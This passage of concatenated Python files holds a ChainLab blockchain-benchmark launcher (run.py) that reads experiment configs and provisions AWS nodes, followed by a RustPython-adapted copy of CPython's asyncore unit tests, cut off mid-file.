def __exit__(self, exc_type: Optional[Type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]) -> None:
RealtimeLogger._stopLeader()
|
run.py | # Copyright 2020 ChainLab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import copy
import json
import logging.config
import os
import pprint
import sys
import threading
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from src.Experiment_Handler import Experiment_Handler
from src.Experiment_Handler import NetworkNotStartingError
from BlockchainFormation.utils.utils import *
from DAppFormation.DApp_Handler import DApp_Handler
from BlockchainFormation.Node_Handler import Node_Handler
class ArgParser:
def __init__(self):
"""Initialize an ArgParser object.
The general structure of calls from the command line is:
run.py --config path_to_config
"""
self.parser = argparse.ArgumentParser(description='This script evaluates Blockchains',
usage='Give path to config with all experiment relevant settings')
self.parser.add_argument('--config', '-c', help='enter path to config file')
self.parser.add_argument('--exp_dir', '-e', help='enter path to experiment directory')
self.parser.add_argument('--freqs', '-f', help='enter frequency', type=int, nargs='+')
self.parser.add_argument('--shape', '-s', help='enter shape')
self.parser.add_argument('--duration', '-d', help='enter duration',type=int)
self.parser.add_argument('--delta_max_time', '-m', help='enter max time',type=int)
def load_config(self, namespace_dict):
"""
Loads the config from a given JSON file
:param namespace_dict: namespace dict containing the config file path
:return: config dict
"""
# print(namespace_dict)
if namespace_dict["exp_dir"] is None:
if namespace_dict['config'].endswith('.json'):
try:
with open(namespace_dict['config']) as json_file:
return json.load(json_file)
except:
logger.error("ERROR: Problem loading the given config file")
else:
logger.exception("Config file needs to be of type JSON")
raise Exception("Config file needs to be of type JSON")
else:
if "exp_dir" in list(namespace_dict.keys()):
try:
with open(f"{namespace_dict['exp_dir']}/config.json") as json_file:
config = json.load(json_file)
config['number_of_setups'] = 1
config['number_of_experiments'] = 1
for key in namespace_dict:
config["experiment_settings"][key] = namespace_dict[key]
return config
except Exception as e:
logger.exception(e)
logger.error("ERROR: Problem loading the experiment")
if __name__ == '__main__':
dir_name = os.path.dirname(os.path.realpath(__file__))
logging.basicConfig(filename=f'{dir_name}/logger.log', level=logging.DEBUG,
format='%(asctime)s - %(threadName)s - %(name)s - %(levelname)s - %(message)s')
logging.captureWarnings(True)
# create logger with
logger = logging.getLogger(__name__)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(threadName)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(ch)
logger.info(" ___ ___ ___ ")
logger.info(" | | ___ | | | | ")
logger.info(" | D |\ | | /| P |---| S | ")
logger.info(" |___| \| L |/ |___| |___| ")
logger.info(" |___| ")
logger.info(" ")
logger.info(" ====================================================== ")
logger.info(" Distributed Ledger Performance Scan ")
logger.info(" ====================================================== ")
logger.info(" ")
logger.info(" ")
logger.info(" ____________ _____________ ____________ ")
logger.info(" /__________ /| /___________ /| /__________ /| ")
logger.info(" | | | | | | | | | ")
logger.info(" | BMW |-|----| Uni.LU |-|----| FhG FIT | | ")
logger.info(" | | | | | | | FIM | | ")
logger.info(" | | | | | | | | | ")
logger.info(" | P. Ross | / | | / |J. Sedlmeir| / ")
logger.info(" |___________|/ |____________|/ |___________|/ ")
logger.info(" ")
logger.info(" ")
logger.info(" ====================================================== ")
logger.info(" Licensed under the Apache License, Version 2.0 ")
logger.info(" =======================================================")
logger.info(" ")
logger.info(" ")
logger.info(" ____ _____ _ ____ _____ ")
logger.info(" / ___| |_ _| / \ | _ \ |_ _| ")
logger.info(" \___ \ | | / _ \ | |_) | | | ")
logger.info(" ___) | | | / ___ \ | _ < | | ")
logger.info(" |____/ |_| /_/ \_\ |_| \_\ |_| ")
logger.info(" ")
logger.info(" ")
argparser = ArgParser()
namespace = argparser.parser.parse_args()
# loading the total experiment config
config = argparser.load_config(vars(namespace))
if vars(namespace)["exp_dir"] == None:
print("Startup mode selected")
# os.system(f"truncate -s 0 {dir_name}/logger.log")
# os.truncate(path=f"{dir_name}/logger.log", length=10)
# splitting the config into single experiment configs
setup_configs = []
experiment_configs = []
blockchain_config = config['blockchain_formation_settings']
client_config = config['client_settings']
experiment_config = config['experiment_settings']
number_setups = config['number_of_setups']
number_experiments = config['number_of_experiments']
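    # Illustrative expansion of list-valued settings (values are made up):
    #   "vm_count": [4]        -> every setup uses vm_count 4
    #   "vm_count": [4, 8, 16] -> setup i uses vm_count[i]
    #                             (requires number_of_setups == 3)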
# Loop through all possible setups and start network/clients, run experiments and shutdown network/client again
for index in range(0, number_setups):
blockchain_config_run = {}
if len(blockchain_config['vm_count']) == 1:
blockchain_config_run['vm_count'] = blockchain_config['vm_count'][0]
elif len(blockchain_config['vm_count']) == number_setups:
blockchain_config_run['vm_count'] = blockchain_config['vm_count'][index]
else:
raise Exception(f"config[blockchain_formation_settings][vm_count] has invalid length")
if len(blockchain_config['instance_type']) == 1:
blockchain_config_run['instance_type'] = blockchain_config['instance_type'][0]
elif len(blockchain_config['instance_type']) == number_setups:
blockchain_config_run['instance_type'] = blockchain_config['instance_type'][index]
else:
raise Exception(f"config[blockchain_formation_settings][instance_type] has invalid length")
blockchain_config_run['instance_provision'] = "aws"
if len(blockchain_config['aws_region']) == 1:
blockchain_config_run['aws_region'] = blockchain_config['aws_region'][0]
elif len(blockchain_config['aws_region']) == number_setups:
blockchain_config_run['aws_region'] = blockchain_config['aws_region'][index]
else:
raise Exception(f"config[blockchain_formation_settings][aws_region] has invalid length")
for key in blockchain_config:
if key in ["vm_count", "instance_type", "instance_provision", "aws_region"]:
pass
elif key == f"{blockchain_config['blockchain_type']}_settings":
help = blockchain_config[f"{blockchain_config['blockchain_type']}_settings"]
help_run = {}
for l in help:
if len(help[l]) == 1:
help_run[l] = help[l][0]
elif len(help[l]) == number_setups:
help_run[l] = help[l][index]
else:
raise Exception(f"config[blockchain_formation_settings][{blockchain_config['blockchain_type']}_settings][{l}] has invalid length")
blockchain_config_run[f"{blockchain_config['blockchain_type']}_settings"] = help_run
else:
blockchain_config_run[key] = blockchain_config[key]
client_config_run = {}
for key in client_config:
                if isinstance(client_config[key], dict):
                    client_config_run[key] = client_config[key]
                elif len(client_config[key]) == 1:
                    client_config_run[key] = client_config[key][0]
elif len(client_config[key]) == number_setups:
client_config_run[key] = client_config[key][index]
else:
raise Exception(f"config[client_settings][{key}] has invalid length")
setup_configs.append(dict([("blockchain_formation_settings", blockchain_config_run), ("client_settings", client_config_run)]))
for index in range(0, number_experiments):
experiment_config_run = {}
for key in experiment_config:
if len(experiment_config[key]) == 1:
experiment_config_run[key] = experiment_config[key][0]
elif len(experiment_config[key]) == number_experiments:
experiment_config_run[key] = experiment_config[key][index]
else:
raise Exception(f"config[experiment_settings][{key}] has invalid length")
experiment_configs.append(experiment_config_run)
for index in range(0, number_setups):
# os.system("rm logger.log")
# os.system("touch logger.log")
try:
blockchain_config_help = setup_configs[index]['blockchain_formation_settings']
# Create Client VMs if needed with the same subnet/security/proxy settings as blockchain network
# if blockchain_config_help['instance_provision'] == "aws":
client_config_help = copy.deepcopy(blockchain_config_help)
                # TODO Do we need both client_config and client_formation config? One should be enough, right?
# Delete blockchain specific settings from conf
client_config_help.pop(f"{blockchain_config_help['blockchain_type']}_settings", None)
# TODO Implement option to host client nodes in a different subnet. Needed since the private VPC subnets are rather small (<60 IPs available)
client_config_help["vm_count"] = setup_configs[index]['client_settings']["number_of_clients"]
client_config_help["instance_type"] = setup_configs[index]['client_settings']["client_type"]
client_config_help["instance_provision"] = setup_configs[index]['client_settings']['instance_provision']
client_config_help['aws_region'] = setup_configs[index]['client_settings']["aws_region"]
client_config_help["user"] = blockchain_config["user"]
client_config_help["priv_key_path"] = blockchain_config["priv_key_path"]
# elif blockchain_config['instance_provision'] == "own":
# client_config = dapp_config['client_settings']
if blockchain_config_help["blockchain_type"] == "indy":
client_config_help["blockchain_type"] = "indy_client"
elif blockchain_config_help["blockchain_type"] == "acapy":
blockchain_config_help["blockchain_type"] = "indy"
client_config_help["blockchain_type"] = "acapy"
else:
client_config_help["blockchain_type"] = "client"
client_config_help["tag_name"] = setup_configs[index]['client_settings']["tag_name"]
client_config_help['exp_dir'] = setup_configs[index]['client_settings']["exp_dir"]
# Set this to None temporarily to allow threading
client_config_help["client_settings"] = {
# "target_network_conf": self.vm_handler_blockchain.get_config_path(),
"target_network_conf": None
}
if blockchain_config_help["blockchain_type"] == "fabric" and blockchain_config_help["fabric_settings"]["prometheus"] == True:
logger.info("Fabric selected - adding additional config")
additional_config_help = copy.deepcopy(blockchain_config_help)
# Insert prometheus_settings in fabric_config
additional_config_help.pop(f"{blockchain_config_help['blockchain_type']}_settings", None)
additional_config_help["vm_count"] = 1
additional_config_help["aws_region"] = {"eu-central-1": 1}
additional_config_help["instance_type"] = "m5.large"
additional_config_help["blockchain_type"] = "prometheus"
additional_config_help["user"] = blockchain_config_help["user"]
additional_config_help["priv_key_path"] = blockchain_config_help["priv_key_path"]
additional_config_help["prometheus_settings"] = {}
additional_config_help["tag_name"] = "blclab_prometheus"
additional_config_help["additional_settings"] = {
"target_network_conf": None
}
else:
additional_config_help = None
"""
logger.info("Blockchain config: ")
pprint.pprint(blockchain_config_help)
logger.info(" ")
logger.info(" ")
logger.info("Client config: ")
pprint.pprint(client_config_help)
logger.info(" ")
logger.info(" ")
logger.debug("Additional config: ")
pprint.pprint(additional_config_help)
"""
# Creating a new Experiment Handler
if blockchain_config_help["blockchain_type"] == "fabric" and blockchain_config_help["fabric_settings"]["prometheus"] == True:
# experiment_handler = Experiment_Handler(logger, DApp_Handler(Node_Handler(blockchain_config_help), Node_Handler(client_config_help), logger, Node_Handler(additional_config_help)), config, [experiment_configs[index]])
experiment_handler = Experiment_Handler(logger, DApp_Handler(Node_Handler(blockchain_config_help), Node_Handler(client_config_help), logger, Node_Handler(additional_config_help)), config, experiment_configs)
else:
# experiment_handler = Experiment_Handler(logger, DApp_Handler(Node_Handler(blockchain_config_help), Node_Handler(client_config_help), logger), config, [experiment_configs[index]])
experiment_handler = Experiment_Handler(logger, DApp_Handler(Node_Handler(blockchain_config_help), Node_Handler(client_config_help), logger), config, experiment_configs)
logger.info(" ")
logger.info("==========================================================")
logger.info("==========Starting Blockchain and Client Network==========")
logger.info("==========================================================")
logger.info(" ")
try:
experiment_handler.start_dapp()
experiment_handler.run_experiment()
# catching ctrl-c and killing network if desired
except KeyboardInterrupt:
logger.info("CTRL-C detected. Exiting gracefully by terminating network if desired.")
if yes_or_no("Do you want to shut down the whole network? If yes, the next experiment will be carried out."):
pass
else:
raise KeyboardInterrupt
except Exception as e:
logger.exception(e)
pass
logger.info(" ")
logger.info("========================================================")
logger.info("======= Terminating Blockchain and Client Network ======")
logger.info("======= ======")
logger.info("======= Evaluation Experiment ======")
logger.info("========================================================")
logger.info(" ")
network_termination_thread = threading.Thread(target=experiment_handler.terminate_network, name="DApp-Termination")
experiment_evaluation_thread = threading.Thread(target=experiment_handler.evaluate_experiment, name="Experiment-Evaluation")
network_termination_thread.start()
experiment_evaluation_thread.start()
network_termination_thread.join()
experiment_evaluation_thread.join()
except Exception as e:
logger.exception(e)
logger.info(f"Setup {index} failed.")
else:
print("\n\n\n")
print(config)
print("\n\n\n")
print([config["experiment_settings"]])
experiment_handler = Experiment_Handler(logger, DApp_Handler(Node_Handler(config["blockchain_formation_settings"]), Node_Handler(config["client_settings"]), logger), config, [config["experiment_settings"]])
try:
experiment_handler.run_experiment()
except Exception as e:
logger.exception(e)
logger.info(" ")
logger.info(" ")
logger.info(" _____ _ _ ____ ")
logger.info(" | ____| | \ | | | _ \ ")
logger.info(" | _| | \| | | | | | ")
logger.info(" | |___ | |\ | | |_| | ")
logger.info(" |_____| |_| \_| |____/ ")
logger.info(" ")
logger.info(" ")
logger.info(" ")
|
test_asyncore.py | import asyncore
import unittest
import select
import os
import socket
import sys
import time
import errno
import struct
import threading
from test import support
from io import BytesIO
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
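# Minimal test doubles: dummysocket/dummychannel stand in for real sockets,
# exitingdummy raises asyncore.ExitNow from every event handler, and
# crashingdummy raises a generic Exception and records whether
# handle_error() ran.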
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen()
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.monotonic()
while n > 0 and time.monotonic() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
support.unlink(addr)
support.bind_unix_socket(sock, addr)
else:
sock.bind(addr)
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
        # check that ExitNow exceptions in the object handler method
        # bubble all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
            # check that ExitNow exceptions in the object handler method
            # bubble all the way up through the asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
with support.captured_stderr() as stderr:
d.log(l1)
d.log(l2)
lines = stderr.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
with support.captured_stdout() as stdout:
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
lines = stdout.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
with support.captured_stdout() as stdout:
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
lines = stdout.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event']
self.assertEqual(lines, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
# TODO: RUSTPYTHON
@unittest.expectedFailure
@support.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = support.bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((support.HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
support.join_thread(t, timeout=TIMEOUT)
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(support.TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
support.unlink(support.TESTFN)
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'assertion failed: `(left != right)` left: `-1`, right: `-1`'")
def test_recv(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(support.TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
with support.check_warnings(('', ResourceWarning)):
f = None
support.gc_collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_close_twice(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5):
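        # poll the asyncore loop in short slices, checking instance.flag
        # after each slice; give up after roughly `timeout` seconds in total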
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
                    # in order for handle_close to be called we need to
                    # make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll:
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
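                # deliberately raise ZeroDivisionError so that asyncore
                # routes it to handle_error()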
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
@unittest.skipIf(sys.platform == "win32", "TODO: RUSTPYTHON, Windows-only fail")
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
self.assertEqual(s.socket.type, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, self.family)
self.assertEqual(s.socket.gettimeout(), 0)
self.assertFalse(s.socket.get_inheritable())
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(OSError, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with socket.socket(self.family) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
# TODO: RUSTPYTHON
@unittest.expectedFailure
